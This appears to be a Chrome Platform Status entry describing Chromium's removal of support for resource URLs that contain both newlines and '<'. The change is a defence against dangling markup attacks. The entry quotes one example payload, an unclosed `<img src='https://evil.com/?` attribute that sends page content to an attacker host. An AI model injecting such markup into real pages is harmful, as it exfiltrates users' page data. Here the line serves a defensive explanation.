Blocking resources whose URLs contain both `\n` and `<` characters. (removed)

As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.

Specification

Editor's draft

Status in Chromium

Blink>SecurityFeature


Removed (launch bug) in:

  • Chrome for desktop release 61
  • Chrome for Android release 61
  • Android WebView release 61
  • Opera release 48
  • Opera for Android release 48

Consensus & Standardization

  • No public signals
  • No public signals
  • No public signals
  • No signals

Owner

Last updated on 2017-06-14